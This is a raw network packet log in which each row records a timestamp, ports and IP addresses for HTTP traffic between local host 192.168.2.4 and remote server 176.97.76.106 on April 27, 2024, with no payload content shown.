Apr 27, 2024 00:46:06.397860050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397878885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397892952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397903919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397922993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397958994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397979975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397991896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397994041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.398005962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398024082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.398078918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398114920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.398135900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398149014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398185968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.398261070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398273945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398284912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398303032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.398312092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398328066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398346901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.398350000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398382902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.398435116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398448944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398480892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398483038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.398505926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398540020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.398559093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398571014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398582935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398600101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.398655891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398690939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.398693085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398757935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398771048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398789883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.398833990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398869038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.398921967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398933887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398947001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.398962021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.398979902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399014950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.399017096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399029970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399051905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399064064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.399102926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399116039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399132013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.399164915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399202108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.399220943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399244070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399271965 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.399312019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399327040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399338007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399350882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399359941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.399364948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399380922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399384022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.399411917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.399421930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399502039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399516106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399528027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399532080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.399539948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399550915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399554968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.399585009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399586916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.399652958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399684906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.399717093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399729967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.399765015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.421416044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421462059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421500921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421506882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.421538115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421576023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.421581030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421627045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421667099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.421672106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421716928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421746969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.421752930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421788931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421828032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.421842098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421876907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421912909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421916008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.421947956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421983957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.421984911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.422020912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422058105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422060013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.422092915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422128916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422132969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.422164917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422202110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422205925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.422236919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422272921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422276974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.422307968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422343016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422348976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.422396898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422432899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422436953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.422468901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422518969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.422523022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422559023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422595024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422595978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.422630072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422666073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.422667027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422713041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422753096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.422756910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422802925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422843933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.422843933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422880888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422916889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.422919035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422955036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422990084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.422992945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.423024893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.423059940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.423060894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.423095942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.423131943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.423134089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.423166990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.423202991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.423207045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.423238039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.423270941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.423273087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.423307896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.423346996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.454663038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.454730988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.454777002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.454777956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.454824924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.454866886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.454868078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.454905033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.454942942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.455053091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.455180883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.455223083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.455264091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.455379009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.455416918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.455420017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.455519915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.455555916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.455581903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.455661058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.455699921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.455753088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.455846071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.455888987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.455946922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.456018925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.456058979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.456195116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.456232071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.456270933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.456316948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.456387997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.456428051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.456470966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.456609964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.456650972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.456697941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.467704058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.586576939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.586901903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.586940050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.586945057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.587029934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.587069988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.587114096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.587212086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.587251902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.587291956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.587363958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.587402105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.587439060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.587532997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.587573051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.587599993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.587697029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.587733030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.587766886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.587882996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.587917089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.587949991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.588041067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.588073969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.588181019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.588207960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.588239908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.588339090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.588429928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.588465929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.588531017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.588601112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.588634968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.588669062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.588783979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.588819981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.588871956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.588932037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.588967085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.589021921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.589112997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.589144945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.589194059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.589297056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.589328051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.589371920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.589456081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.589488029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.589545012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.589615107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.589644909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.589709997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.589799881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.589829922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.589869976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.589958906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.589994907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.590037107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.590116978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.590150118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.590219021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.590311050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.590347052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.590387106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.590461969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.590498924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.590538979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.590621948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.590662003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.590739965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.590807915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.590842009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.590871096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.591000080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.591037989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.591080904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.591178894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.591211081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.591249943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.591348886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.591387033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.591438055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.591542959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.591578960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.591728926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.591855049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.591885090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.591952085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.592053890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.592089891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.592128038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.592370987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.592407942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.592422009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.592521906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.592561007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.592595100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.592695951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.592731953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.592792988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.592876911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.592906952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.592940092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.593039036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.593070030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.593110085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.593206882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.593244076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.593307972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.593409061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.593445063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.593494892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.593615055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.593655109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.593729019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.593822956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.593859911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.593893051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.593959093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.593997955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.594052076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.594141960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.594172955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.594213009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.594314098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.594347000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.594424963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.594485998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.594521999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.594564915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.594665051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.594700098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.594743967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.594837904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.594873905 CEST	49734	80	192.168.2.4	176.97.76.106
